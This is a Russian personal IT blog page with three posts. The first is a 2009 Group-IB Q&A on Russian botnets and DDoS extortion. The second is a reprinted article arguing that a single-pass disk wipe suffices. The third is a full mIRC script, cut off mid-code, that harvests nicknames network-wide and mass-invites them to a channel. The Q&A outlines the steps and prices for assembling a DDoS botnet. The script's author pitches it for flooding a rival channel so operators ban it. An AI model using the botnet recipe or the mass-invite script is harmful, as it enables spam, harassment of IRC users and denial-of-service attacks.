- IT-тематика - основной блог. Администрирование, софт, безопасность, интересные сайты и сервисы.
- Фотография - увлекаюсь в некоторой мере фотографией, просто хобби, я не фотограф. Собрано немного полезных статей.
- Притчи - моя подборка красивых, коротких и мудрых притч.
понедельник, декабря 10, 2012
суббота, марта 14, 2009
Статьи: Краткий аналитический вопросник по бот-сетям в РФ 2009 год
В этой статье мы обобщили информацию, добавили последние сведения и некоторую аналитическую информацию по бот-сетям и по их одному из основных предназначений – DDOS атак. Статья построена по принципу вопрос-ответ в неофициальном тоне. Мы отвечали на вопросы, которые присылали и задавали нам пользователи, поэтому, некоторые вопросы могут показаться элементарными для понимания. Тем не менее, огромное количество писем, приходящих в Group-IB имеют примерно такое содержание:
Тема письма: Doss атака
Я ходила по ссылкам "Скачать бесплатно программу Advanced PC Tweaker" Во первых на всех ссылках были всплывающие окна ввиде рекламы с порнографическим содержанием и вообще, в какой раздел не зайди, сначало порно сайт нужно закрыть.Программу я так и не нашла...атем я ушла на маил.ру, в свой основной почтовый ящик на mail.ru, но к своему изумлению не могу ничего посмотреть. На весь экран картинка с порнографией и приписочка:Для удален выберите страну, отправьте СМС с текстом XMS 2273070 на номер 3649, введите код (в окошко) и удалить. Вы не ошиблись не для скачивания СМС отправить, а для удаления этой самой порно картинки...Пожалуйсто избавьте меня от этой отаки!!!
(Это не шутка. Текст письма опубликован без изменений )
Именно поэтому, опубликовывая ответы на простые вопросы, мы надеемся, что это хоть как-то повысит уровень грамотности Интернет населения нашей страны.
Приветствуются новые вопросы, ответы на которые мы опубликуем во второй части статьи.
Каковы тенденции распространения и развития бот сетей и, как следствия DDOS атак в России?
-DDoS-атаки (от англ. Distributed Denial of Service, распределённый отказ в обслуживании) в последние несколько лет стали одним из самых распространенных преступлений в киберпространстве. Чаще всего хакеры организуют подобные нападения на серверы государственных органов и крупных бизнес-структур. Более того, в 2004 году появился такой вид преступлений, как шантаж возможностью проведения DDoS-атаки.
Бот сети явление, которое в России становится актуальным, начиная с 2003 года (хотя технология достаточная старая). Первоначально была доступна узкому кругу высокообразованных людей. После многих публикаций с описанием технологии, а так же участившихся случаев DDOS атак и засилью спама стала достаточно популярной и широкодоступной.
На данный момент содержание бот сетей - одна из самых выгодных в Интернете (сегмент СНГ) наравне с кардингом.
Начиная с 2005 года бот сети приобрели массовый характер, а так же процесс становления основных самых крупных сетей пришел в сбалансированное положение. Тем не менее, с точки зрения законодательства изменений никаких не произошло: DDOS расценивается как статьи 272 и 273 УК РФ. Следователей в МВД крайне мало, и методы противодействия бот сетям достаточно быстро устаревают. Конкретных судебных решений недостаточно. В то же время, рассылка спама не является каким-либо преступлением.
Бот сети являются сейчас самой эффективной системой информационной войны. Существуют даже аппаратные комплексы для осуществления DDOS атак.
- Какие трудности испытывают компании по борьбе с DDOS атаками в России и СНГ?
В России и СНГ борьба с бот сетями осложнена по следующим причинам:
1. Отсутствие в России CERT’ов (Computer Emergency Response Team)
2. Слабое техническое оснащение правоохранительных органов/малочисленность штата.
3. Отсутствие международных соглашений и законодательства по борьбе с подобными явлениями.
4. Политическая ситуация.
5. Техническая безграмотность населения и простота заражения ПК вирусами. Стоимость заражения 1000 машин вирусами начинается от 20 долларов США.
На данный момент в России только один CERT (или правильнее CSIRT).
В ближайшее время и Group-IB получит статус CERT
CERT - это команда по реагированию на инциденты информационной безопасности. В мире сейчас зарегистрирована 201 команда в 43 странах мира. Целью команд является координация действий между провайдерами, конечными пользователями для предотвращения или минимизации инцидента ИБ. А так же: обмен информацией, изучение методов борьбы и расследование инцидентов. Информацию о существующих командах можно получить тут - http://first.org/members/map/. Команды объедены под эгидой организации FIRST и их действия носят некоммерческий характер.
- Каковы тенденции развития бот сетей в РФ за последние годы?
За последние два года (2007-2008 год) в России наблюдались следующие тенденции для бот-сетей:
1. Укрупнение. Малые бот сети вливались в более крупные, то есть происходило их объединение и наращивание силы для возможности более мощной атаки.
2. Децентрализация. Управляющие центры переносятся в страны третьего мира и децентрализуются.
3. Появление непрофессиональных бот сетей: с помощью конструкторов или специальных программ для их создания. Для создания и управления такой сетью не требуются специальные знания.
4. Профессиональные бот сети стали использовать передовые технологии для управления и обеспечения анонимности. В частности, некоторые сети стали использовать технологию аутентификации portknocking.
Кратко опишем смысл: чтобы открыть порт для связи с ботом, управляющий центр простукивает в определенной последовательности, с определенным набором данных и с определенным типом соединения закрытые порты, и только после этого порт для связи открывается. До этого сетевую активность бота практически не обнаружить. Если учесть, что количество простукиваний может быть насколько угодно большим, то получается, что это отличный метод для использования, например, для двухфакторной аутентификации в корпоративной практике.
Ещё один пример интересной технологии: вирус, попадая на машину (обычно для этого используются уязвимости браузера или ОС), самостоятельно загружает серый патч, который эту уязвимость закрывает. Таким образом, войдя в ОС, вирус закрывает за собой дверь.
- В чем особенность и в чем их специфические отличия и общие сходства бот сетей в России и в остальном мире?
Во-первых, нельзя не упомянуть о том, что из-за проблем с законодательством и, по сути, с правовым беспределом в сети Интернет, бот сети в Российской Федерации на данный момент и ближайшие 5 лет будут основным нелегальным источником дохода в сети. Криминальные структуры уже давно стали частью данного сообщества.
Таким образом, владельцы бот сетей делают инвестиции, исследования и разработки направленные на:
- увеличение числа ботов
- стабильность управляющих серверов
- анонимность
- распределенность
- стабильность
Превратившись в сферу бизнеса, бот сеть, как бизнес единица развивается, как обычная компания: маркетинг, девелопмент, безопасность. Из-за того что РФ имеет большую территорию, а так же в связи с увеличением скорости доступа в сеть интернет во многих регионах России (по оценкам различных аналитиков на момент августа 2008 года Россия по увеличению скорости доступа в интернет входит в ТОП-10) бот сети даже в России имеют такую распределенность, которая позволяет осуществлять DDOS атаки на определенный ресурс, исключая ботов данного региона (это используется для усложнения расследования). Другими словами находясь в городе Анадырь можно иметь ботнет сеть которая раскидана по всем остальным 83 регионам России, что делает поимку киберпреступника крайне сложной. Некоторые бот сети являются сугубо русскими и используются для нелегальной деятельности в других странах.
Отсюда можно сделать вывод:
Основным отличием России от стран большой 8-ки, а так же других развитых стран мира
- Относительная безопасность владельцев бот сетей. Сложность проведения расследований.
- Высокий доход (от 1000$ до 50000$)
- Связь с криминальными структурами различных сфер.
- Высокая одаренность определенных людей, которые в связи со сложной экономической ситуацией вынуждены заниматься созданием и разработкой вирусов/бот сетей и т.п.
- В целом низкая освещенность данной проблемы в обычных СМИ. Обычные люди не знают «что это такое».
- Большая территориальная распределенность бот сетей.
- Развитие Интернет технологий в России что приводит к увеличению производительностей ботнет сетей.
В чем заключается бизнес, людей, которые создают бот-сети
Основным источником дохода для владельцев бот сетей является:
- Рассылка спама. Это очень выгодный бизнес. Фактически легальный, т.к. явных законов, запрещающих рассылку спама нет.
- DDOS атаки. Нелегальное, но тем не менее самое выгодное и опасное для атакуемого событие информационной безопасности, самая актуальная угроза и один из лучших способов ведения информационной и телекоммуникационной войны. Компании, которые защищаются от DDOS атак – тратят огромные деньги, тем не менее, перед серьезной бот сетью остаются уязвимыми. Способ получения денег – шантаж или заказ на конкретный ресурс.
- Подбор паролей для дальнейшего взлома какого-либо сервиса (использование бот сети в качестве распределенной вычислительной машины). Используется для взлома сайтов/порталов и т.п.
- Вопрос от начинающего Интернет пользователя: Как зарождаются бот сети?
Этот вопрос носит важный характер. Потому что даже сейчас многие, кто читают эту статью, ничего не подозревая, являются соучастниками DDOS атаки, например, на крупный банковский сервер или же на любую другую фирму. Постараемся рассказать все примитивно и по пунктам:
- Любое заражение начинается со «спама» определенного Интернет ресурса, на котором содержится вредоносный код. Преступник рассылает зараженный сайт путем e-mail или ICQ. Ничего не подозревающий Интернет пользователь, попадаясь на уловку мошенника, переходит по ссылке и ему на компьютер автоматически загружается вирус.
- После чего вирус глубоко прячется в компьютер жертвы и ждет команды из управляющего центра, который, как правило, владелец ботнета устанавливает на сервер в далекой и солнечной Панаме или на Кокосовых островах, и в таком случае засечь владельца практически не возможно.(но рано или поздно возможно все)
- Владелец сети ждет момента, когда заразятся порядка 1000 машин и, зайдя в управляющий центр, нажатием одной кнопки и определенным запросом вызывает шквал атак направленных на определенный ресурс. И буквально в течение 10 минут сервер, не справляясь с количеством запросов, начинает виснуть.
- Известно, что киберпреступность в целом носит мировой характер. Известно ли о возможных связях людей из РФ с такими же группами за границей?
Практика показывает, что такие связи, конечно же, имеются. Абсолютными фактами являются:
Среди связей преобладают:
1. Эмигранты первой волны после распада СССР. Основные места жительства США, Канада, Израиль, Австралия, Евросоюз
2. Поздние эмигранты. (после 2000 года)
3. Хакеры эмигранты. Люди, которые в целях безопасности покинули нашу страну, но продолжают заниматься незаконной деятельностью.
Общая тенденция следующая: из-за различий законодательства в различных странах и больших возможностях в России по созданию бот сетей ИТ-специалисты устанавливали старые или приобретали новые связи в РФ с целью использовать имеющийся в России потенциал. Роли таких людей различны: от организаторов, до посредников западного заказчика перед российским исполнителем.
Отдельно стоит упомянуть эмигрантов, уезжающих уже с имеющимися бот-сетями. Обычно такие люди уезжают в страны с очень слаборазвитым законодательством 60% (Бали(Индонезия) , Гоа(Индия), Панама, Мексика, Бразилия), но есть и исключения США, Канада и т.д.
- Как преступники используют «выращенные» ботнет сети?
Существует всего несколько способов, например атака по заказу конкурирующей компании или же просто атака с целью рэкета.
Основной способ влияния – DDOS атака.
При мощной бот сети практически 100 % результат.
Как же в целом используются бот-сети?
- Межхакерские войны или anticyber-crimes акции. Атаки на управляющий центр для отражения атаки, попытки завладеть чужими ботами, маркетинговая акция (атакуем чужой управляющий центр, показываем, что чужая сеть не работает – получаем заказ).
- Банковский сектор, сектор электронных платежей. Атакуется сервер банк-клиента, или коммуникационный сервер системы электронных платежей. Очень распространенное явление(каждый день). Предполагаемые цели – маркетинг. Использование информации для понижения имиджа банка. В случае систем моментальных платежей – клиент просто пользуется системой конкурента.
- Политический сектор. Средство ведения информационной войны. Интернет как основное средство СМИ. Атакуются сайт политических партий, организаций связанных с религией. Участие в этом государства.
- Сектор телекоммуникаций – связь/хостинги/провайдеры. Атаки по заказу конкурентов с целью, как и в пункте 1. Атакуются не сайты, а телекоммуникационные узлы.
- Какие основные механизмы обналичивания денег, полученных подобными путями?
Существует много способов обналичивания денег полученных при помощи такой деятельности. Но чаще всего в РФ используются известные нам системы такие как WebMoney или Яндекс-деньги. Основным способом получения денег является безналичные переводы через системы электронных платежей – Egold и Libery. Далее деньги переводятся в WebMoney: их можно обналичить в любом банке или перевести на карточку.
Выбор данных валют (Egold и Libery) связан в основном с безопасностью участников сделки. Сервера находятся на Панаме, логгирование и установление цепочки транзакций практически не реально.
Многие платежные системы WebMoney, Яндекс деньги постепенно запрещают обмен с данными валютами, но существует много способов обхода данных ограничений.
Необходимо добавить, что новички часто используют и обычные способы оплаты.
Спам оплачивается очень часто по договору с компанией осуществляющей рассылку, которая в свою очередь способом, описанным выше, осуществляет платеж владельцу бот сети.
В последнее время владельцы серьезных бот сетей работают через посредников, используя рекомендации и другие вещи для собственной безопасности. Об этом можно почитать в соответствующих топиках(чаще всего закрытых) на хак-форумах.
- А какие самые известные существующие группы?
Вообще говоря, информация о существующих группах является конфиденциальной, т.к. по большинству из них возбуждены уголовные дела или идет разработка. Но вот, например, ссылки на статьи и видео по самым громким делам в РФ.
http://www.1tv.ru/news/crime/137032
http://www.xakep.ru/post/40051/default.asp
- Бот сети и DDOS атаки это только коммерция?
Конечно, нет. Ведь не всегда смысл заключается только в денежном эквиваленте. Как яркие примеры тому может служить хакерские атаки на грузинские сайты во время августовского конфликта. При этом СМИ России отнеслись к данному факту крайне спокойно, и не одного дела возбуждено не было.
Если рассматривать другие международные атаки, то можно вспомнить пример с Эстонией. Тогда было начато международное расследование, которое продолжается и по сей день. Многие группы участвовали в атаках не из коммерческих замыслов. Заказчика у данных атак не было - они носили спонтанный политический характер.
- Какие основные этапы заказа DDOS атаки?
Если усреднить имеющуюся у нас информацию, то можно обозначить следующие стадии:
- Получение заказа
- Выполнение тестовой работы
- Предоплата (от 50 до 100 %)
- Выполнение работы
Не стоит забывать, что на каждой из студий и заказчик и исполнитель друг - друга проверяют. Существуют черные и белые списки заказчиков и исполнителей, которые можно найти на хороших хакерских форумах.
- Любой человек может воспользоваться услугами подобных сервисов в своих личных целях?
К сожалению, получается, что это так. Действительно любой может зайти на хакерский форум, где он найдет рекламу десятков подобных сервисов. Иногда подобную рекламу можно увидеть даже в объявлениях Яндекс-директ или Google Adwords. Взять «на тест» бот сеть может любой пользователь и, причем совершенно бесплатно. А ведь даже 10 минут DDOS’a крупной Интернет компании может привести к миллионным убыткам, поэтому необходимо защитить себя, прежде чем вы окажетесь жертвой преступников.
- Можно ли сделать ботнет сеть на заказ? Так сказать ботнет под ключ?
Можно, только это уголовно наказуемо. И мы, как и правоохранительные органы с этим активно боремся.
Но к сожалению, действительно совершенно каждый из нас может заказать создание DDOS ботнета. Делается это довольно просто: достаточно опубликовать объявление на одном из хакерских форумов и через некоторое время с вами свяжутся. Стоимость ботнета рассчитывается из учета некоторых факторов.
Первое что влияет на стоимость - это месторасположение центра, то есть другими словами, где расположен сервер, на котором будет создаваться управляющий центр ботнет сетью. Аренда такого сервера в месяц сейчас составляет приблизительно около 250 долларов в месяц.
Второй и немаловажный фактор это сам скрипт управляющего центра и билдер ( который делает вирусы, проникающие на машину жертвы) Стоимость такого комплекта варьируется в пределах от 500 до 1000 $. Конечно можно скачать разные комплекты, которые находятся в паблике ( то есть доступны для свободного скачивания) любому пользователю сети Интернет. Но паблик-версии ботов очень уязвимы.
Следующим пунктом можно назвать сплоит.
Сплоит
Сплоит – это специальный скрипт расположенный на сайте куда попадает жертва, несущий в себе вредоносный код который использует уязвимости браузеров. При попадании на такой сайт, жертве, как правило, загружается .exe программа, которая весит около 3-10кб, и автоматически запускается. Она абсолютно незаметна для пользователя, который может месяцами не догадываться, что его компьютер используется в плохих целях. Данная малюсенькая программка и есть то страшное оружие, посредством, которого и происходят ddos атаки. Естественно не каждый пользователь, который попадает на зараженную страничку, становится жертвой. Каждый сплоит характеризуется определенным процентом «пробива». Чем больше % - тем соответственно и больше цена. Например, если «пробив» составляет 20 %, то это значит, что на 1000 зашедших на зараженный сайт посетителей 200 человек загрузят вирус и, как правило, вредоносная программа нормально запустится лишь у 100 – 150 человек в виду разных причин. Максимальный «пробив» сплоита может быть не более 40-45% при условии, что он только написан и использует самые новые уязвимости браузеров. Цена сплоита при пробиве в 20 % обычно около 300 – 500 $. Максимальная цена примерно 1000 $(хотя бывают споиты стоимостью 9000-15000 тысяч долларов). В этом случае качество сплоита будет заметно выше.
Трафик.
Трафик – это те посетители, которые заходят на сайт и впоследствии заражаются. Далее таких пользователей мы будем называть зомби – ботами или просто ботами.
Трафик бывает разный. От него в первую очередь зависит качество DDOS ботнета, то есть такие параметры как мощность ботнета (исчисляется в МБ ), скорость смерти зомби - ботов. Обычно на хакерских форумах цены колеблются от 3 $ до 20 $ за 1000 уникальных посетителей на сайт. Цена также зависит от места расположения пользователя, а следовательно, и ширины его Интернет канала.
Теперь несложными подсчетами мы можем посчитать, сколько нужно трафика и денежных средств, чтобы создать внушительную ботнет сеть, например из 10000 машин, которые будут находиться онлайн. Берем трафик из расчета 3 $ за 1000 человек при среднем «пробиве» сплоита в 20 %. При подсчете получим 50000 трафика. Теперь умножим это на 3$ за 1000 трафика и получим 150 $.
Ну и конечно не стоит забывать о вознаграждении тому, кто для вас создает такую сеть. Как правило, продавец попросит порядка 200 -300 долларов за свою работу.
Берем минимальные значения цен:
Подсчеты:
- Аренда сервера ( 1 месяц )…………………………………………… 250 $
- Пакет скриптов + билдер …………………………………….……… 500 $
- Сплоит ……………………………….300 $
- Трафик ……………………………. 150 $
- Работа …………………………….200 $
Итого: …………………………..1400 $
Примечание: ни в коем случае эту информацию не стоит воспринимать как призыв к действию. Мы хотим лишь показать, что сейчас подобного рода преступления (а это настоящее преступление) совершаются довольно просто. Российскому ИТ и ИБ сообществу необходимо сплотиться, чтобы задавить подобные тенденции в Интернете, а не заниматься наполнением бюджетов за счет внедрения очередных средств безопасности в нефтегазовых компаниях.
Как можно описать процесс создания DDOS сети по пунктам?
- Аренда сервера.
- Покупка скриптов и билдера.
- Установка скриптов на сервер их настройка.
- Настройка DDOS вируса с помощью билдера
- Покупка трафика
Можно ли купить уже готовый ботнет?
Специально никто не создает ботнеты с целью продажи. Но в полнее возможно, что кто-то захочет продать свой существующий ботнет ввиду разных причин. Тут основным ценовым фактором является количество зомби – ботов онлайн (т.е. которые показываются в админке) Цена может быть совершенно разная. Её устанавливает продавец.
Как долго может жить ботнет сеть?
Хакер, как садовод - «следит и ухаживает» за своей сетью. Когда из управляющего центра боту подается команда атаки, которая исчисляется количеством пакетов, то если задать большое количество, то бот может, не справится с запросом и умереть. Очень часто причиной смерти бота может служить установка современного антивируса, который обнаружит и удалит зараженный файл.
Еще одной причиной может служить переустановка/обновление Windows или другой ОС. Также стоит отметить, что количество ботов непостоянно, так как ночью компьютеры, чаще всего, выключаются. Но когда пользователь вновь входит в Интернет, то бот «просыпается».
Как можно приблизительно рассчитать мощность определенной сети?
Например, если вам сказали что трафик был немецкий, то можно понять что в Германии достаточно мощные Интернет каналы порядка 2 – 10 мб в каждом доме. В основном вывод делают из того откуда был трафик. В новых управляющих центрах можно наглядно посмотреть, сколько и каких ботов присутствует в сети. Например это будет выглядеть вот так :
Как распознать используется ли мой компьютер в качестве одного их звеньев ботнет сети?
Это можно заметить только во время активности вируса. Самый простая пользовательская проверка в ОС Windows, например: ощутимое замедление Интернета, а если перейти в диспетчер задач на вкладку Сеть, то сеть будет использована практически на 100 %. Естественно это непрофессиональный метод и существуют специальные утилиты, с помощью которых проводится аудит.
Какова мощность ботнета способного остановить среднестатистические сервера? Или другими словами, сколько должно быть ботов онлайн в управляющем центре чтобы «убить» сервер, если измерять не в гигабитах, а в ботах?
Опять же повторяем, что все зависит страны зомби-машины/от протокола/типа атаки и многих многих других факторов. Если усреднить, то, как правило, если имеется ботнет численностью в 2500 компьютеров, которые находятся на территории Германии, то такой мощности хватит чтобы на некоторое время остановить сервер I-Bank среднестатистического банка РФ (а иногда и очень крупного).
Ждем новых вопросов.
Лопухин Иван lopukhin@group-ib.ru
И. Сачков sachkov@group-ib.ru
Группа информационной безопасности Group-IB (www.group-ib.ru)
вторник, февраля 03, 2009
Статьи: Разоблачение мифа о многократной перезаписи
Автор: Киви Берд
Опубликовано 03 февраля 2009 года
В мире компьютерной криминалистики довольно часто приходится слышать спорные мнения о необходимом или желательном количестве проходов программы, удаляющей информацию с жесткого диска. Процедуру, в ходе которой поверх прежних данных записывается случайная последовательность нулей и единиц, именуют зачисткой (wiping) или надежным стиранием диска. С одной стороны, ряд экспертов и даже солидные организации, вроде Национального института стандартов и технологий США, утверждают, что единственного wipe-прохода достаточно для того, чтобы данные на диске были безвозвратно уничтожены.
С другой - давно написанные инструкции Министерства обороны США и аналогичных ведомств других стран требуют многократного применения зачистки. А наиболее озабоченные безопасностью специалисты настаивают на десяти или даже тридцати пяти проходах (так называемая "схема Гутмана"), поскольку, дескать, известны случаи успешного восстановления данных после одного-двух применений вайпинга.
Камнем преткновения в этих нескончаемых спорах является тот неоспоримый факт, что положение головки считывания-записи при каждом новом проходе хоть на микроскопическую величину, но отличается от предыдущего. Иначе говоря, новые данные, записываемые на диск, могут расположиться не в точности на тех же местах, где были расположены первоначальные биты. А это значит, что в принципе, получив с помощью высокоточной аппаратуры сканирования картину распределения магнитных полей на диске, можно автоматизировать анализ и отделение прежних данных от новых.
Однако то, что справедливо для накопителей на жестких магнитных дисках вообще, вовсе не обязательно будет справедливо для используемой в реальной жизни техники. Именно это, собственно, и демонстрирует активно обсуждаемая ныне в Интернете статья эксперта по компьютерной криминалистике Крейга Райта (Craig Wright), который заявляет, что положил конец легенде о недостаточности единственного прохода вайпингом.
Крейг и его коллеги провели исследование, в ходе которого тщательно изучили жесткие диски разных производителей. В частности, эксперты перезаписывали хранимую этими накопителями информацию в контролируемых условиях, а затем исследовали магнитные поверхности с помощью аппаратуры магнитно-силовой микроскопии (МСМ), позволяющей получать картину магнитного поля с максимально доступным разрешением. Технология анализа на основе МСМ считается самым мощным на сегодняшний день инструментом для восстановления утраченных данных с магнитных носителей.
Результаты исследований группа представила на недавней Международной конференции по безопасности информационных систем, а в январе этого года сокращенное изложение той же работы выложено в свободный доступ.
Авторы констатируют, что уже после единственной перезаписи данных на диске, независимо от того, идет ли речь о старом одногигабайтном носителе или современной модели гораздо большей ёмкости, вероятность успешного восстановления хоть какой-то содержательной информации ничтожна.
Впрочем, есть несколько оговорок. При разборе реального примера показано, что один конкретный бит, местоположение которого аналитику известно, может быть восстановлен с вероятностью 56%. Однако для того, чтобы восстановить целиком байт, то есть цепочку идущих подряд битов, предельно точное позиционирование головки должно быть повторено восемь раз, а вероятность этого составляет всего лишь 0,97%. Если же говорить о восстановлении информации длиной свыше одного байта, то здесь шансы на успех выглядят совсем безнадежными.
Конечно, нашлись и скептики, не готовые вот так сразу отказаться от прежних убеждений. Известный новозеландский криптограф Питер Гутман (Peter Gutmann), на которого чаще всего ссылаются создатели программ гарантированной зачистки ("стирание в тридцать пять проходов по методу Гутмана"), уже сделал несколько едких критических замечаний по поводу исследований команды Райта.
Суть комментария известного криптографа сводится к следующему: "Восстановление перезаписанных данных с любого современного винчестера скорее всего окажется безнадежной задачей; что же касается сверхвысоких плотностей и применения перпендикулярной записи, то я вообще не вижу, каким образом можно было бы использовать здесь МСМ для получения образов, реально пригодных для работы по восстановлению первоначальных данных".
Иначе говоря, Гутману явно не понравились методы Крейга и компании, однако он вполне согласен с итоговыми выводами их работы.
Источник: http://www.computerra.ru/own/399167/
воскресенье, февраля 01, 2009
Invite mirc script by elimS
Скрипт рабочий, но доделать можно много чего. Потому и не хотел пока вылаживать. Но раз просят - таки запостю.
Итак, что делает скрипт?
Он собирает по сети все ники, а потом тупо начинает всех инвайтит на канал. при превышении лимита инвайтов - реконект и дальше продолжение инвайтов. канал быстро растет, так как у многих стоит автоджойн при инвайте. Собираем ники таким образом - бегает по всем каналам и берет ники которые на них сидят.
Для чего можно его использовать?
Вы фанат ирц и хотите быстро набрать большое количество людей на канале - этот скрипт для Вас.
Только используйте скрипт осторожно. не собирайте ники с служебных каналов типа хелп и абюз. Поставьте в исключения ники иркопов, не поленитесь. И галочку не ставьте напротив опов и халфопов в блоке "на кого д действует скрипт"
У Вас есть вражеский канал, на котором сидят люди, которые всю дорогу его рекламируют и тем самым мешают вам жить?
Что ж и в этом случае скрипт для Вас. Помогите им с рекламой ихнего канала и не забудьте скриптом всех иркопов заинвайтить, а если вы уже всех заинвайтили, но иркопы все равно вас не заметили - начните заново. Гарантирую что скоро и канал дропнут на который шлються инвайты и опов канала накажут и проксю из под которой вы запускали скрипт - в глайн кинут.
Приступим к установке скрипта:
копируем код который ниже и заходим в mirc-редактор скриптов (сочетание клавиш alt+r).
menu nicklist {
открыть инвайт скрипт: dialog -m invite_options invite_options
указать файл ник-листа исключений: %invite_nick_list_iskluchenija = $file="Выберите файл со списком ников:" .txt
добавить в ник-лист исключений: $iif( %invite_nick_list_iskluchenija == $null, echo $me 4укажите ник-лист исключений! , write %invite_nick_list_iskluchenija $1 )
обнулить исключения: write -c %invite_nick_list_iskluchenija
проверить ник на исключение: %temp = $read(%invite_nick_list_iskluchenija, w, $1 ) | $iif( $readn == 0, echo $me 3 $1 ник не в исключениях! , echo $me 4 $1 ник в исключениях!)
}
alias invite_al {
if ( $me ison %invite_kanal) {
inc %invite_nick_list_i 1
%invite_nick = $read(%invite_nick_list,%invite_nick_list_i)
%invite_prefix = $mid(%invite_nick,1,1)
if ( ( ( %invite_prefix != @ ) || (%invite_op == on) ) && ( ( %invite_prefix != % ) || (%invite_hop == on) ) && ( ( %invite_prefix != + ) || (%invite_vop == on) ) ) {
if ( ( %invite_prefix = @ ) || ( %invite_prefix = % ) || ( %invite_prefix = + ) ) %invite_nick = $mid(%invite_nick,2,$len(%invite_nick))
if ( %invite_nick !ison %invite_kanal ) {
%invite_list_i2 = 0
%invate_dublikate = false
while ( invite_list_i2 < $lines($mircdir $+ invite_list.txt) ) { inc invite_list_i2 1 if ( %invite_nick == $read($mircdir $+ invite_list.txt,invite_list_i2) ) %invate_dublikate = true } %temp = $read(%invite_nick_list_iskluchenija, w, %invite_nick ) if ( %invate_dublikate != true ) && ($readn == 0) { write $mircdir $+ invite_list.txt %invite_nick invite %invite_nick %invite_kanal } } } if ( %invite_nick_list_i >= $lines( %invite_nick_list ) ) {
%invite_status = off
notice $me инвайт закончен, итого было позвано $lines($mircdir $+ invite_list.txt) ) людей.
timer_invite off
}
}
else cs invite %invite_kanal
}
menu menubar {
invite by elimS: dialog -m invite_options invite_options
}
dialog invite_options {
title "Скрипт для мас-инвайта. Ver. 2.0"
size -1 -1 140 195
option dbu
tab "Основные",1, 1 1 135 190
tab "Допольнительные",100
button "указать канал",2, 10 20 50 10 , tab 1
button "частота инвайта",3, 10 35 50 10 , tab 1
edit "",4, 60 20 70 10, read autohs , tab 1
edit "",5, 60 35 70 10, read autohs , tab 1
button "Старт!",6, 10 65 120 20 , tab 1
button "Стоп!",7, 10 90 120 20 , tab 1
box "на кого будет действовать скрипт",8, 10 110 120 30 , tab 1
check "+o: опы", 9, 18 118 40 10 , tab 1
check "+h: халфопы", 10, 60 118 50 10 , tab 1
check "+v: войсопы", 11, 18 128 40 10 , tab 1
check "обычные юзеры", 12, 60 128 50 10 , tab 1
check "реконект при Message target too fast", 13, 18 140 110 10 , tab 1
button "величина канала",14, 10 50 50 10 , tab 1
edit "",15, 60 50 70 10, read autohs , tab 1
check "удерживать на канале", 16, 10 20 90 10 , tab 100
button "начать инвайт из указаного ник-листа",17, 10 40 110 10 , tab 100
edit "", 18, 10 55 110 10 ,read autohs, tab 100
box "ник-лист",19, 5 30 120 45 , tab 100
box "исключения",24, 5 80 120 45 , tab 100
edit "", 25, 10 105 110 10 ,read autohs, tab 100
button "выбрать ник-лист исключений",26, 10 90 110 10 , tab 100
text "скрипт написал elimS",35 20, 5 153 90 10
link "http://elims2.blogspot.com", 36, 5 168 90 10
}
on 1:dialog:invite_options:init:0: {
did -a invite_options 4 %invite_kanal
did -a invite_options 5 %invite_time
did -a invite_options 15 %invite_users
did -a invite_options 18 %invite_nick_list
did -a invite_options 25 %invite_nick_list_iskluchenija
if (%invite_op == on) did -c invite_options 9
if (%invite_hop == on) did -c invite_options 10
if (%invite_vop == on) did -c invite_options 11
if (%invite_user == on) did -c invite_options 12
if (%invite_reconnect == on) did -c invite_options 13
if (%invite_yderzhivat == on) did -c invite_options 16
}
on 1:dialog:invite_options:sclick,edit:*: {
if ($did == 2) {
set %invite_kanal $$input(введите канал (вместе с префиксом #) на который хотите инвайтить: , e )
did -r invite_options 4
did -a invite_options 4 %invite_kanal
}
if ($did == 3) {
set %invite_time $$input(введите частоту посылки invite сообщения в милисекундах (1 секунда = 1000 милисекунд), e)
did -r invite_options 5
did -a invite_options 5 %invite_time
}
if ($did == 14) {
set %invite_users $$input(введите на каналах с каким количеством людей производить сбор ников (введите количество людей):, e)
did -r invite_options 15
did -a invite_options 15 %invite_users
}
if ($did == 6) {
%invite_status = on
%invite_nick_list = $mircdir $+ chanel_nick_list.txt
%invite_flag = sbor_kanalov
remove $mircdir $+ chanel_list.txt
notice $me сбор каналов...
list
}
if ($did == 7) {
timer_invite off
%invite_status = off
}
if ($did == 17) {
%invite_nick_list = $file="Выберите файл со списком ников:" .txt
did -r invite_options 18
did -a invite_options 18 %invite_nick_list
timer_invite_chan_list off
%invite_flag = off
%invite_lines_nick_list = $lines( %invite_nick_list )
%invite_nick_list_i = 0
%invite_status = on
write -c $mircdir $+ invite_list.txt начало
notice $me инвайт людей...
timer_invite -m 0 %invite_time invite_al
}
if ($did == 26) {
%invite_nick_list_iskluchenija = $file="Выберите файл со списком ников:" .txt
did -r invite_options 25
did -a invite_options 25 %invite_nick_list_iskluchenija
}
if ($did == 9) $iif(%invite_op == on,%invite_op = off,%invite_op = on)
if ($did == 10) $iif(%invite_hop == on,%invite_hop = off,%invite_hop = on)
if ($did == 11) $iif(%invite_vop == on,%invite_vop = off,%invite_vop = on)
if ($did == 12) $iif(%invite_user == on,%invite_user = off,%invite_user = on)
if ($did == 13) $iif(%invite_reconnect == on,%invite_reconnect = off,%invite_reconnect = on)
if ($did == 16) $iif(%invite_yderzhivat == on,%invite_yderzhivat = off,%invite_yderzhivat = on)
if ($did == 36) run http://elims2.blogspot.com
}
;start--- сбор сбор каналов -----------
raw 322:*: {
if ( %invite_status == on ) && ( %invite_flag == sbor_kanalov ) {
if ( $len($2) > 1 ) && ( $3 >= %invite_users ) {
write chanel_list.txt $2 $3
}
}
}
;end--- сбор каналов -----------
;start--- реконект при ошыбке -----------
raw 439:*: {
if ( %invite_status == on ) {
if ( %invite_reconnect == on ) && ( Message target change too fast. isin $1- ) server
}
}
;end---- реконект при ошибке -----------
;start--- join каналов -----------
alias al_chan_list {
if ( %invite_status == on ) && ( %invite_flag == join_kanalov ) {
if ( %invite_list_i_chan > $lines($mircdir $+ chanel_list.txt) ) {
timer_invite_chan_list off
%invite_flag = off
%invite_lines_nick_list = $lines( %invite_nick_list )
%invite_nick_list_i = 0
write -c $mircdir $+ invite_list.txt начало
notice $me инвайт людей...
timer_invite -m 0 %invite_time invite_al
}
inc %invite_list_i_chan 1
%invite_chan_list = $read($mircdir $+ chanel_list.txt,%invite_list_i_chan)
join $gettok(%invite_chan_list,1,32)
if ( $gettok(%invite_chan_list,1,32) != %invite_kanal ) part $gettok(%invite_chan_list,1,32)
}
}
;end--- join каналов -----------
start--- конец листа -----------
raw 323:*: {
if ( %invite_status == on ) && ( %invite_flag == sbor_kanalov ) {
remove $mircdir $+ chanel_nick_list.txt
%invite_list_i_chan = 0
